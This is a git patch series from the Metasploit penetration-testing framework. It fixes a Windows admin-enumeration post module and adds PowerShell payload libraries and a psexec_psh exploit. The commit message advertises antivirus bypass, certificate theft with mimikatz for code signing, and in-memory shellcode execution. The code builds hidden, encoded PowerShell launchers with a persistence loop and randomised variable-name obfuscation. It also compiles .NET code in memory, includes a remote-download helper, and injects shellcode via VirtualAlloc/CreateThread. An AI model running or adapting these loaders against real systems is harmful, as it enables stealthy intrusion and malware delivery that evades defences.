From 595e5387839d14cc9de8c692592e26ee96db6a01 Mon Sep 17 00:00:00 2001
From: g0tmi1k <g0tmi1k>
Date: Wed, 3 Jul 2013 00:43:08 +0100
Subject: [PATCH 001/321] post/local_admin_search_enum~Regex fails,module 2 If
 the regex fails then the entire moudle would too

---
 .../post/windows/gather/local_admin_search_enum.rb | 14 ++++++++++----
 1 file changed, 10 insertions(+), 4 deletions(-)

diff --git a/modules/post/windows/gather/local_admin_search_enum.rb b/modules/post/windows/gather/local_admin_search_enum.rb
index 72cfcc8d7f..1e405d9669 100644
--- a/modules/post/windows/gather/local_admin_search_enum.rb
+++ b/modules/post/windows/gather/local_admin_search_enum.rb
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Post
 		super(update_info(info,
 			'Name'         => 'Windows Gather Local Admin Search',
 			'Description'  => %q{
-					This module will identify systems in a given range that the
+				This module will identify systems in a given range that the
 				supplied domain user (should migrate into a user pid) has administrative
 				access to by using the Windows API OpenSCManagerA to establishing a handle
 				to the remote host. Additionally it can enumerate logged in users and group
@@ -80,10 +80,16 @@ class Metasploit3 < Msf::Post
 
 				# Check if RSOP data exists, if not disable group check
 				unless res =~ /does not have RSOP data./
-					@domain_controller = /Group Policy was applied from:\s*(.*)\s*/.match(res)[1].chomp
+					dc_applied = /Group Policy was applied from:\s*(.*)\s*/.match(res)
+					if dc_applied
+						@domain_controller = dc_applied[1].strip
+					else
+						@dc_error = true
+						print_error("Could not read RSOP data, will not enumerate users and groups. Manually specify DC.")
+					end
 				else
 					@dc_error = true
-					print_error("User never logged into device, will not enumerate groups or manually specify DC.")
+					print_error("User never logged into device, will not enumerate users and groups. Manually specify DC.")
 				end
 			end
 		end
@@ -255,4 +261,4 @@ class Metasploit3 < Msf::Post
 		p = store_loot(type, 'text/plain', host, "#{host}:#{user}", 'hosts_localadmin.txt', user)
 		vprint_status("User data stored in: #{p}")
 	end
-end
\ No newline at end of file
+end

From 4554cc6e514540b8115a579fa282f25ce74596cf Mon Sep 17 00:00:00 2001
From: RageLtMan <rageltman [at] sempervictus>
Date: Thu, 4 Jul 2013 12:44:44 -0400
Subject: [PATCH 002/321] Import Powershell libs and modules (again)

Add Rex powershell parser:
 reads PSH, determines functions, variables, blocks
 compresses and cleans up the code it's read, obfuscates
 handles string literals and reserved variable names
 extracts code blocks and functions for reuse
  turns powersploit into a useful sub-component for MSF
Rewire Msf powershell modules
 Make use of Rex parser
 Handles payload generation, substituions
 Brings convenience methods - byte array generation and download
 Re-add .NET compiler
  Compiles .NET code (C#/VB.NET) in memory
  Can generate binary output file (dynamic persistence)
  Handles code-signing (steal cert with mimikatz, sign your bin)
  Not detected by AV (still...)
 Update payload generation
  GZip compression and decompression (see Rex module as well)
  msftidy violations for space efficiency - each char counts
Re-submit psexec-psh
 Makes use of updated Msf and Rex modules
 Runs shellcode in-memory (in a hidden PSH window)
 Completely bypasses all AVs tested for the last year...
---
 lib/msf/core/exploit/powershell.rb            | 189 ++++++++
 lib/msf/core/exploit/powershell/dot_net.rb    | 172 ++++++++
 lib/msf/core/post/windows/powershell.rb       | 287 +++++++-----
 lib/msf/util/exe.rb                           | 149 +++----
 lib/rex/exploitation/powershell.rb            | 412 ++++++++++++++++++
 modules/exploits/windows/smb/psexec_psh.rb    | 104 +++++
 .../windows/manage/powershell/exec_cmd.rb     |  77 ++++
 .../windows/manage/powershell/exec_script.rb  |  90 ++++
 8 files changed, 1279 insertions(+), 201 deletions(-)
 create mode 100644 lib/msf/core/exploit/powershell.rb
 create mode 100644 lib/msf/core/exploit/powershell/dot_net.rb
 create mode 100644 lib/rex/exploitation/powershell.rb
 create mode 100644 modules/exploits/windows/smb/psexec_psh.rb
 create mode 100644 modules/post/windows/manage/powershell/exec_cmd.rb
 create mode 100644 modules/post/windows/manage/powershell/exec_script.rb

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
new file mode 100644
index 0000000000..ac66534343
--- /dev/null
+++ b/lib/msf/core/exploit/powershell.rb
@@ -0,0 +1,189 @@
+# -*- coding: binary -*-
+require 'rex/exploitation/powershell'
+
+module Msf
+module Exploit::Powershell
+
+	class PshScript < Rex::Exploitation::Powershell::Script
+	end
+
+	def initialize(info = {})
+		super
+		register_advanced_options(
+			[
+				OptBool.new('RUN_WOW64', [
+					false,
+					'Execute powershell in 32bit compatibility mode, payloads need native arch',
+					false
+						]),
+				OptBool.new('PSH::strip_comments', [false, 'Strip comments', true]),
+				OptBool.new('PSH::strip_whitespace', [false, 'Strip whitespace', false]),
+				OptBool.new('PSH::sub_vars', [false, 'Substitute variable names', false]),
+				OptBool.new('PSH::sub_funcs', [false, 'Substitute function names', false]),
+			], self.class)
+	end
+
+	#
+	# Reads script into a PshScript
+	#
+	def read_script(script)
+		return PshScript.new(script)
+	end
+
+	#
+	# Insert substitutions into the powershell script
+	#
+	def make_subs(script, subs)
+		if ::File.file?(script)
+			script = ::File.read(script)
+		end
+
+		subs.each do |set|
+			script.gsub!(set[0],set[1])
+		end
+		# if datastore['VERBOSE']
+		#   print_good("Final Script: ")
+		#   script.each_line {|l| print_status("\t#{l}")}
+		# end
+		return script
+	end
+
+	#
+	# Return an array of substitutions for use in make_subs
+	#
+	def process_subs(subs)
+		return [] if subs.nil? or subs.empty?
+		new_subs = []
+		subs.split(';').each do |set|
+			new_subs << set.split(',', 2)
+		end
+		return new_subs
+	end
+
+	#
+	# Return a gzip compressed powershell script
+	# Will invoke PSH modifiers as enabled
+	#
+	def compress_script(script_in, eof = nil)
+		# Build script object
+		psh = PshScript.new(script_in)
+		# Invoke enabled modifiers
+		datastore.select {|k,v| k =~ /^PSH::(strip|sub)/ and v == 'true' }.keys.map do |k|
+			mod_method = k.split('::').last.intern
+			psh.send(mod_method)
+		end
+		return psh.compress_code(eof)
+	end
+
+	#
+	# Runs powershell in hidden window raising interactive proc msg
+	#
+	def run_hidden_psh(ps_code,ps_bin='powershell.exe')
+		ps_args = " -EncodedCommand #{ compress_script(ps_code) } "
+
+		ps_wrapper = <<EOS
+$si = New-Object System.Diagnostics.ProcessStartInfo
+$si.FileName = "#{ps_bin}"
+$si.Arguments = '#{ps_args}'
+$si.UseShellExecute = $false
+$si.RedirectStandardOutput = $true
+$si.WindowStyle = 'Hidden'
+$si.CreateNoWindow = $True
+$p = [System.Diagnostics.Process]::Start($si)
+EOS
+
+		return ps_wrapper.gsub("\n",';')
+	end
+
+	#
+	# Creates cmd script to execute psh payload
+	#
+	def cmd_psh_payload(pay, old_psh=false)
+		# Allow powershell 1.0 format
+		if old_psh
+			psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
+		else
+			psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
+		end
+		# Run our payload in a while loop
+		if datastore['PERSIST']
+			fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
+			sleep_time = rand(5)+5
+			psh_payload  = "function #{fun_name}{#{psh_payload}};"
+			psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
+		end
+		# Determine appropriate architecture, manual method reduces script size
+		ps_bin = datastore['RUN_WOW64'] ? '$env:windir\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
+		# Wrap in hidden runtime
+		psh_payload = run_hidden_psh(psh_payload,ps_bin)
+		# Convert to base64 for -encodedcommand execution
+		command = "%COMSPEC% /B /C start /min powershell.exe -Command \"#{psh_payload.gsub('"','\"')}\"\r\n"
+	end
+
+
+	#
+	# Useful method cache
+	#
+	module PshMethods
+
+		#
+		# Convert binary to byte array, read from file if able
+		#
+		def self.to_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
+			code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
+			code = code.unpack('C*')
+			psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
+			lines = []
+			1.upto(code.length-1) do |byte|
+				if(byte % 10 == 0)
+					lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
+				else
+					lines.push ",0x#{code[byte].to_s(16)}"
+				end
+			end
+
+			return psh << lines.join("") + "\r\n"
+		end
+
+		#
+		# Download file to host via PSH
+		#
+		def self.download(src,target=nil)
+			target ||= '$pwd\\' << src.split('/').last
+			return %Q^(new-object System.Net.WebClient).Downloadfile("#{src}", "#{target}")^
+		end
+
+		#
+		# Uninstall app
+		#
+		def self.uninstall(app,fuzzy=true)
+			match = fuzzy ? '-like' : '-eq'
+			return %Q^$app = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name #{match} "#{app}" }; $app.Uninstall()^
+		end
+
+		#
+		# Create secure string from plaintext
+		#
+		def self.secure_string(str)
+			return %Q^ConvertTo-SecureString -string '#{str}' -AsPlainText -Force$^
+		end
+
+		#
+		# MISC
+		#
+
+		#
+		# Find PID of file locker
+		#
+		def self.who_locked_file?(filename)
+			return %Q^ Get-Process | foreach{$processVar = $_;$_.Modules | foreach{if($_.FileName -eq "#{filename}"){$processVar.Name + " PID:" + $processVar.id}}}^
+		end
+
+
+		def self.get_last_login(user)
+			return %Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^
+		end
+	end
+end
+end
+
diff --git a/lib/msf/core/exploit/powershell/dot_net.rb b/lib/msf/core/exploit/powershell/dot_net.rb
new file mode 100644
index 0000000000..0369a7bd9a
--- /dev/null
+++ b/lib/msf/core/exploit/powershell/dot_net.rb
@@ -0,0 +1,172 @@
+# -*- coding: binary -*-
+
+module Msf
+  module Exploit::Powershell
+    module DotNet
+
+    	def initialize(info = {})
+    		super
+    		register_advanced_options(
+    		[
+    			OptString.new('CERT_PATH', [false, 'Path on host to .pfx fomatted certificate for signing' ]),
+
+    		], self.class)
+    	end
+
+    	def dot_net_compiler(opts = {})
+    		#TODO:
+    		# allow compilation entirely in memory with a b64 encoded product for export without disk access
+    		# Dynamically assign assemblies based on dot_net_code require/includes
+    		# 	Enumerate assemblies available to session, pull requirements, assign accordingly, pass to PS
+
+    		# Critical
+    		dot_net_code = opts[:harness]
+    		if ::File.file?(dot_net_code)
+    			dot_net_code = ::File.read(dot_net_code)
+    			#vprint_good("Read file in #{dot_net_code.encoding.name} encoding")
+    		end
+    		return if dot_net_code.nil? or dot_net_code.empty?
+
+    		# Ensure we're not running ASCII-8bit through powershell
+    		dot_net_code = dot_net_code.force_encoding('ASCII')
+
+    		# Optional
+    		provider = opts[:provider] || 'Microsoft.CSharp.CSharpCodeProvider' # This should also work with 'Microsoft.VisualBasic.VBCodeProvider'
+    		target = opts[:target] # Unless building assemblies in memory only
+    		certificate = opts[:cert] # PFX certificate path
+    		payload = opts[:payload]
+
+    		assemblies = ["mscorlib.dll", "System.dll", "System.Xml.dll", "System.Data.dll", "System.Net.dll"]
+    		if opts[:assemblies]
+    			opts[:assemblies] = opts[:assemblies].split(',').map {|a| agsub(/\s+/,'')} unless opts[:assemblies].is_a?(Array)
+    			assemblies += opts[:assemblies]
+    		end
+    		# 	# Read our code, attempt to find required assemblies
+    		# 	inc_var = provider == 'Microsoft.VisualBasic.VBCodeProvider' ? 'imports' : 'using'
+    		# 	assemblies =+ dot_net_code.split("\n").keep_if {|line| line =~ /^#{inc_var}.*;/i }.map do |dep|
+    		# 		dep[dep.index(/\s/)+1..-2] + '.dll'
+    		# 	end
+    		# end
+    		assemblies = assemblies.uniq.compact
+
+    		compiler_opts = opts[:com_opts] || '/platform:x86 /optimize'
+
+
+    		if payload
+    			dot_net_code = dot_net_code.gsub('MSF_PAYLOAD_SPACE', payload)
+    		end
+
+    		var_gen_exe = target ? '$true' : '$false'
+
+    		# Obfu
+    		var_func = Rex::Text.rand_text_alpha(rand(8)+8)
+    		var_code = Rex::Text.rand_text_alpha(rand(8)+8)
+    		var_refs = Rex::Text.rand_text_alpha(rand(8)+8)
+    		var_provider = Rex::Text.rand_text_alpha(rand(8)+8)
+    		var_params = Rex::Text.rand_text_alpha(rand(8)+8)
+    		var_output = Rex::Text.rand_text_alpha(rand(8)+8)
+    		var_cert = Rex::Text.rand_text_alpha(rand(8)+8)
+
+    		compiler = <<EOS
+function #{var_func} {
+param (
+[string[]] $#{var_code}
+, [string[]] $references = @()
+)
+$#{var_provider} = New-Object #{provider}
+$#{var_params} = New-Object System.CodeDom.Compiler.CompilerParameters
+@( "#{assemblies.join('", "')}", ([System.Reflection.Assembly]::GetAssembly( [PSObject] ).Location) ) | Sort -unique |% { $#{var_params}.ReferencedAssemblies.Add( $_ ) } | Out-Null
+$#{var_params}.GenerateExecutable = #{var_gen_exe}
+$#{var_params}.OutputAssembly = "#{target}"
+$#{var_params}.GenerateInMemory   = $true
+$#{var_params}.CompilerOptions = "#{compiler_opts}"
+# $#{var_params}.IncludeDebugInformation = $true
+$#{var_output} = $#{var_provider}.CompileAssemblyFromSource( $#{var_params}, $#{var_code} )
+if ( $#{var_output}.Errors.Count -gt 0 ) {
+$#{var_output}.Errors |% { Write-Error $_.ToString() }
+} else { return $#{var_output}.CompiledAssembly}
+}
+#{var_func} -#{var_code} @'
+
+#{dot_net_code}
+
+'@
+
+EOS
+
+    		if certificate and target
+    			compiler << <<EOS
+#{var_cert} = Get-PfxCertificate #{certificate}
+Set-AuthenticodeSignature -Filepath #{target} -Cert #{var_cert}
+
+
+EOS
+
+
+    		end
+    		# PS uses .NET 2.0 by default which doesnt work @ present (20120814, RLTM)
+    		# x86 targets also need to be compiled in x86 powershell instance
+    		run_32 = compiler_opts =~ /platform:x86/i ? true : false
+    		if opts[:net_clr] and opts[:net_clr] > 2 # PS before 3.0 natively uses NET 2
+    			return elevate_net_clr(compiler, run_32, opts[:net_clr])
+    		else
+    			return compiler
+    		end
+
+    	end
+
+    	def elevate_net_clr(ps_code, run_32 = false, net_ver = '4.0')
+    		var_func = Rex::Text.rand_text_alpha(rand(8)+8)
+    		var_conf_path = Rex::Text.rand_text_alpha(rand(8)+8)
+    		var_env_name = Rex::Text.rand_text_alpha(rand(8)+8)
+    		var_env_old = Rex::Text.rand_text_alpha(rand(8)+8)
+    		var_run32 = Rex::Text.rand_text_alpha(rand(8)+8)
+
+    		exec_wrapper = <<EOS
+function #{var_func} {
+[CmdletBinding()]
+param (
+[Parameter(Mandatory=$true)]
+[ScriptBlock]
+$ScriptBlock
+)
+$#{var_run32} = $#{run_32.to_s}
+if ($PSVersionTable.CLRVersion.Major -eq #{net_ver.to_i}) {
+Invoke-Command -ScriptBlock $ScriptBlock -ArgumentList $ArgumentList
+return
+}
+$#{var_conf_path} = $Env:TEMP | Join-Path -ChildPath ([Guid]::NewGuid())
+New-Item -Path $#{var_conf_path} -ItemType Container | Out-Null
+@"
+<?xml version="1.0" encoding="utf-8" ?>
+<configuration>
+<startup useLegacyV2RuntimeActivationPolicy="true">
+<supportedRuntime version="v#{net_ver.to_f}"/>
+<supportedRuntime version="v2.0.50727"/>
+</startup>
+</configuration>
+"@ | Set-Content -Path $#{var_conf_path}/powershell.exe.activation_config -Encoding UTF8
+$#{var_env_name} = 'COMPLUS_ApplicationMigrationRuntimeActivationConfigPath'
+$#{var_env_old} = [Environment]::GetEnvironmentVariable($#{var_env_name})
+[Environment]::SetEnvironmentVariable($#{var_env_name}, $#{var_conf_path})
+try { if ($#{var_run32} -and [IntPtr]::size -eq 8 ) {
+&"$env:windir\\syswow64\\windowspowershell\\v1.0\\powershell.exe" -inputformat text -command $ScriptBlock -noninteractive
+} else {
+&"$env:windir\\system32\\windowspowershell\\v1.0\\powershell.exe" -inputformat text -command $ScriptBlock -noninteractive
+}} finally {
+[Environment]::SetEnvironmentVariable($#{var_env_name}, $#{var_env_old})
+$#{var_conf_path} | Remove-Item -Recurse
+}
+}
+#{var_func} -ScriptBlock {
+#{ps_code}
+}
+
+
+EOS
+
+    	end
+
+    end
+  end
+end
diff --git a/lib/msf/core/post/windows/powershell.rb b/lib/msf/core/post/windows/powershell.rb
index 405b35e8f6..b02b4bd552 100644
--- a/lib/msf/core/post/windows/powershell.rb
+++ b/lib/msf/core/post/windows/powershell.rb
@@ -1,5 +1,5 @@
 # -*- coding: binary -*-
-require 'zlib'
+require 'msf/core/exploit/powershell'
 require 'msf/core/post/common'
 
 module Msf
@@ -7,13 +7,18 @@ class Post
 module Windows
 
 module Powershell
+	include ::Msf::Exploit::Powershell
 	include ::Msf::Post::Common
 
-
-	# List of running processes, open channels, and env variables...
-
-
-	# Suffix for environment variables
+	def initialize(info = {})
+		super
+		register_advanced_options(
+			[
+				OptInt.new('PSH::timeout',   [true, 'Powershell execution timeout, set < 0 to run async without termination', 15]),
+				OptBool.new('PSH::log_output', [true, 'Write output to log file', false]),
+				OptBool.new('PSH::dry_run', [true, 'Write output to log file', false]),
+			], self.class)
+	end
 
 	#
 	# Returns true if powershell is installed
@@ -25,108 +30,51 @@ module Powershell
 	end
 
 	#
-	# Insert substitutions into the powershell script
+	# Get/compare list of current PS processes - nested execution can spawn many children
+	# doing checks before and after execution allows us to kill more children...
+	# This is a hack, better solutions are welcome since this could kill user
+	# spawned powershell windows created between comparisons.
 	#
-	def make_subs(script, subs)
-		subs.each do |set|
-			script.gsub!(set[0],set[1])
-		end
-		if datastore['VERBOSE']
-			print_good("Final Script: ")
-			script.each_line {|l| print_status("\t#{l}")}
-		end
+	def get_ps_pids(pids = [])
+		current_pids = session.sys.process.get_processes.keep_if {|p|
+			p['name'].downcase == 'powershell.exe'
+		}.map {|p| p['pid']}
+		# Subtract previously known pids
+		current_pids = (current_pids - pids).uniq
+		return current_pids
 	end
 
 	#
-	# Return an array of substitutions for use in make_subs
+	# Execute a powershell script and return the output, channels, and pids. The script
+	# is never written to disk.
 	#
-	def process_subs(subs)
-		return [] if subs.nil? or subs.empty?
-		new_subs = []
-		subs.split(';').each do |set|
-			new_subs << set.split(',', 2)
-		end
-		return new_subs
-	end
-
-	#
-	# Read in a powershell script stored in +script+
-	#
-	def read_script(script)
-		script_in = ''
-		begin
-			# Open script file for reading
-			fd = ::File.new(script, 'r')
-			while (line = fd.gets)
-				script_in << line
-			end
-
-			# Close open file
-			fd.close()
-		rescue Errno::ENAMETOOLONG, Errno::ENOENT
-			# Treat script as a... script
-			script_in = script
-		end
-		return script_in
-	end
-
-
-	#
-	# Return a zlib compressed powershell script
-	#
-	def compress_script(script_in, eof = nil)
-
-		# Compress using the Deflate algorithm
-		compressed_stream = ::Zlib::Deflate.deflate(script_in,
-			::Zlib::BEST_COMPRESSION)
-
-		# Base64 encode the compressed file contents
-		encoded_stream = Rex::Text.encode_base64(compressed_stream)
-
-		# Build the powershell expression
-		# Decode base64 encoded command and create a stream object
-		psh_expression =  "$stream = New-Object IO.MemoryStream(,"
-		psh_expression += "$([Convert]::FromBase64String('#{encoded_stream}')));"
-		# Read & delete the first two bytes due to incompatibility with MS
-		psh_expression += "$stream.ReadByte()|Out-Null;"
-		psh_expression += "$stream.ReadByte()|Out-Null;"
-		# Uncompress and invoke the expression (execute)
-		psh_expression += "$(Invoke-Expression $(New-Object IO.StreamReader("
-		psh_expression += "$(New-Object IO.Compression.DeflateStream("
-		psh_expression += "$stream,"
-		psh_expression += "[IO.Compression.CompressionMode]::Decompress)),"
-		psh_expression += "[Text.Encoding]::ASCII)).ReadToEnd());"
-
-		# If eof is set, add a marker to signify end of script output
-		if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
-
-		# Convert expression to unicode
-		unicode_expression = Rex::Text.to_unicode(psh_expression)
-
-		# Base64 encode the unicode expression
-		encoded_expression = Rex::Text.encode_base64(unicode_expression)
-
-		return encoded_expression
-	end
-
-	#
-	# Execute a powershell script and return the results. The script is never written
-	# to disk.
-	#
-	def execute_script(script, time_out = 15)
-		running_pids, open_channels = [], []
+	def execute_script(script, greedy_kill = false)
+		@session_pids ||= []
+		running_pids = greedy_kill ? get_ps_pids : []
+		open_channels = []
 		# Execute using -EncodedCommand
-		session.response_timeout = time_out
-		cmd_out = session.sys.process.execute("powershell -EncodedCommand " +
-			"#{script}", nil, {'Hidden' => true, 'Channelized' => true})
+		session.response_timeout = datastore['PSH::timeout'].to_i
+		ps_bin = datastore['RUN_WOW64'] ? '%windir%\syswow64\WindowsPowerShell\v1.0\powershell.exe' : 'powershell.exe'
+		ps_string = "#{ps_bin} -EncodedCommand #{script} -InputFormat None"
+		# vprint_good("EXECUTING:\n#{ps_string}")
+		cmd_out = session.sys.process.execute(ps_string, nil, {'Hidden' => true, 'Channelized' => true})
+
+		# Subtract prior PIDs from current
+		if greedy_kill
+			Rex::ThreadSafe.sleep(3) # Let PS start child procs
+			running_pids = get_ps_pids(running_pids)
+		end
 
 		# Add to list of running processes
 		running_pids << cmd_out.pid
 
+		# All pids start here, so store them in a class variable
+		(@session_pids += running_pids).uniq!
+
 		# Add to list of open channels
 		open_channels << cmd_out
 
-		return [cmd_out, running_pids, open_channels]
+		return [cmd_out, running_pids.uniq, open_channels]
 	end
 
 
@@ -163,8 +111,7 @@ module Powershell
 
 			# Stage the payload
 			print_good(" - Bytes remaining: #{compressed_script.size - index}")
-			execute_script(encoded_stager)
-
+			cmd_out, running_pids, open_channels = execute_script(encoded_stager, false)
 			# Increment index
 			index += count
 
@@ -184,51 +131,104 @@ module Powershell
 	end
 
 	#
-	# Log the results of the powershell script
+	# Reads output of the command channel and empties the buffer.
+	# Will optionally log command output to disk.
 	#
-	def write_to_log(cmd_out, log_file, eof)
-		# Open log file for writing
-		fd = ::File.new(log_file, 'w+')
+	def get_ps_output(cmd_out, eof, read_wait = 5)
+		results = ''
 
-		# Read output until eof and write to log
-		while (line = cmd_out.channel.read())
+		if datastore['PSH::log_output']
+			# Get target's computer name
+			computer_name = session.sys.config.sysinfo['Computer']
+
+			# Create unique log directory
+			log_dir = ::File.join(Msf::Config.log_directory,'scripts','powershell', computer_name)
+			::FileUtils.mkdir_p(log_dir)
+
+			# Define log filename
+			time_stamp  = ::Time.now.strftime('%Y%m%d:%H%M%S')
+			log_file    = ::File.join(log_dir,"#{time_stamp}.txt")
+
+
+			# Open log file for writing
+			fd = ::File.new(log_file, 'w+')
+		end
+
+		# Read output until eof or nil return output and write to log
+		while (1)
+			line = ::Timeout.timeout(read_wait) {
+				cmd_out.channel.read
+			} rescue nil
+			break if line.nil?
 			if (line.sub!(/#{eof}/, ''))
-				fd.write(line)
-				vprint_good("\t#{line}")
-				cmd_out.channel.close()
+				results << line
+				fd.write(line) if fd
+				#vprint_good("\t#{line}")
 				break
 			end
-			fd.write(line)
-			vprint_good("\t#{line}")
+			results << line
+			fd.write(line) if fd
+			#vprint_status("\n#{line}")
 		end
 
 		# Close log file
-		fd.close()
+		# cmd_out.channel.close()
+		fd.close() if fd
 
-		return
+		return results
+
+		#
+		# Incremental read method - NOT USED
+		#
+		# read_data = ''
+		# 	segment = 2**16
+		# 	# Read incrementally smaller blocks after each failure/timeout
+		# 	while segment > 0 do
+		# 		begin
+		# 			read_data << ::Timeout.timeout(read_wait) {
+		# 				cmd_out.channel.read(segment)
+		# 			}
+		# 		rescue
+		# 			segment = segment/2
+		# 		end
+		# 	end
 	end
 
 	#
 	# Clean up powershell script including process and chunks stored in environment variables
 	#
-	def clean_up(script_file = nil, eof = '', running_pids =[], open_channels = [], env_suffix = Rex::Text.rand_text_alpha(8), delete = false)
+	def clean_up(
+		script_file = nil,
+		eof = '',
+		running_pids =[],
+		open_channels = [],
+		env_suffix = Rex::Text.rand_text_alpha(8),
+		delete = false
+	)
 		# Remove environment variables
 		env_del_command =  "[Environment]::GetEnvironmentVariables('User').keys|"
 		env_del_command += "Select-String #{env_suffix}|%{"
 		env_del_command += "[Environment]::SetEnvironmentVariable($_,$null,'User')}"
-		script = compress_script(env_del_command, eof)
-		cmd_out, running_pids, open_channels = *execute_script(script)
-		write_to_log(cmd_out, "/dev/null", eof)
 
-		# Kill running processes
-		running_pids.each() do |pid|
-			session.sys.process.kill(pid)
+		script = compress_script(env_del_command, eof)
+		cmd_out, new_running_pids, new_open_channels = execute_script(script)
+		get_ps_output(cmd_out, eof)
+
+		# Kill running processes, should mutex this...
+		@session_pids = (@session_pids + running_pids + new_running_pids).uniq
+		(running_pids + new_running_pids).uniq.each do |pid|
+			begin
+				session.sys.process.kill(pid)
+				@session_pids.delete(pid)
+			rescue Rex::Post::Meterpreter::RequestError => e
+				print_error "Failed to kill #{pid} due to #{e}"
+			end
 		end
 
 
 		# Close open channels
-		open_channels.each() do |chan|
-			chan.channel.close()
+		(open_channels + new_open_channels).uniq.each do |chan|
+			chan.channel.close
 		end
 
 		::File.delete(script_file) if (script_file and delete)
@@ -236,6 +236,55 @@ module Powershell
 		return
 	end
 
+	#
+	# Simple script execution wrapper, performs all steps
+	# required to execute a string of powershell.
+	# This method will try to kill all powershell.exe PIDs
+	# which appeared during its execution, set greedy_kill
+	# to false if this is not desired.
+	#
+	def psh_exec(script, greedy_kill=true, ps_cleanup=true)
+		# Define vars
+		eof = Rex::Text.rand_text_alpha(8)
+		# eof = "THIS__SCRIPT_HAS__COMPLETED_EXECUTION#{rand(100)}"
+		env_suffix = Rex::Text.rand_text_alpha(8)
+		script = PshScript.new(script) unless script.respond_to?(:compress_code)
+		# Check format
+		if script =~ /\s|\.|\;/
+			script = compress_script(script, eof)
+		end
+		if datastore['PSH::dry_run']
+			return "powershell -EncodedCommand #{script}"
+		else
+			# Check 8k cmd buffer limit, stage if needed
+			if (script.size > 8100)
+				vprint_error("Compressed size: #{script.size}")
+				error_msg =  "Compressed size may cause command to exceed "
+				error_msg += "cmd.exe's 8kB character limit."
+				vprint_error(error_msg)
+				vprint_good('Launching stager:')
+				script = stage_to_env(script, env_suffix)
+				print_good("Payload successfully staged.")
+			else
+				print_good("Compressed size: #{script.size}")
+			end
+			# Execute the script, get the output, and kill the resulting PIDs
+			cmd_out, running_pids, open_channels = execute_script(script, greedy_kill)
+			if datastore['PSH::timeout'].to_i < 0
+				out =  'Started async execution, output collection and cleanup will not be performed'
+				print_error out
+				return out
+			end
+			ps_output = get_ps_output(cmd_out,eof,datastore['PSH::timeout'])
+			# Kill off the resulting processes if needed
+			if ps_cleanup
+				vprint_good( "Cleaning up #{running_pids.join(', ')}" )
+				clean_up(nil, eof, running_pids, open_channels, env_suffix, false)
+			end
+			return ps_output
+		end
+	end
+
 end
 end
 end
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index 08412cb2ba..168b68dadd 100755
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1147,94 +1147,79 @@ End Sub
 		source
 	end
 
-	def self.to_win32pe_psh_net(framework, code, opts={})
-		var_code = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_kernel32 = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_baseaddr = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_threadHandle = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_output = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_temp = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_codeProvider = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_compileParams = Rex::Text.rand_text_alpha(rand(8)+8)
-		var_syscode = Rex::Text.rand_text_alpha(rand(8)+8)
+        def self.to_win32pe_psh_net(framework, code, opts={})
+                var_code = Rex::Text.rand_text_alpha(rand(3)+2)
+                var_kernel32 = Rex::Text.rand_text_alpha(rand(3)+2)
+                var_baseaddr = Rex::Text.rand_text_alpha(rand(3)+2)
+                var_threadHandle = Rex::Text.rand_text_alpha(rand(3)+2)
+                var_output = Rex::Text.rand_text_alpha(rand(3)+2)
+                var_temp = Rex::Text.rand_text_alpha(rand(3)+2)
+                var_codeProvider = Rex::Text.rand_text_alpha(rand(3)+2)
+                var_compileParams = Rex::Text.rand_text_alpha(rand(3)+2)
+                var_syscode = Rex::Text.rand_text_alpha(rand(3)+2)
+                var_function = Rex::Text.rand_text_alpha_lower(rand(3)+2)
 
-		code = code.unpack('C*')
-		psh = "Set-StrictMode -Version 2\r\n"
-		psh << "$#{var_syscode} = @\"\r\nusing System;\r\nusing System.Runtime.InteropServices;\r\n"
-		psh << "namespace #{var_kernel32} {\r\n"
-		psh << "public class func {\r\n"
-		psh << "[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }\r\n"
-		psh << "[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }\r\n"
-		psh << "[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }\r\n"
-		psh << "[DllImport(\"kernel32.dll\")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);\r\n"
-		psh << "[DllImport(\"kernel32.dll\")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);\r\n"
-		psh << "[DllImport(\"kernel32.dll\")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);\r\n"
-		psh << "} }\r\n"
-		psh << "\"@\r\n\r\n"
-		psh << "$#{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider\r\n"
-		psh << "$#{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters\r\n"
-		psh << "$#{var_compileParams}.ReferencedAssemblies.AddRange(@(\"System.dll\", [PsObject].Assembly.Location))\r\n"
-		psh << "$#{var_compileParams}.GenerateInMemory = $True\r\n"
-		psh << "$#{var_output} = $#{var_codeProvider}.CompileAssemblyFromSource($#{var_compileParams}, $#{var_syscode})\r\n\r\n"
+                psh = "Set-StrictMode -Version 2\r\n"
+                # Configure the C# namespace
+                psh << "$#{var_syscode} = @\"\r\nusing System;\r\nusing System.Runtime.InteropServices;\r\n"
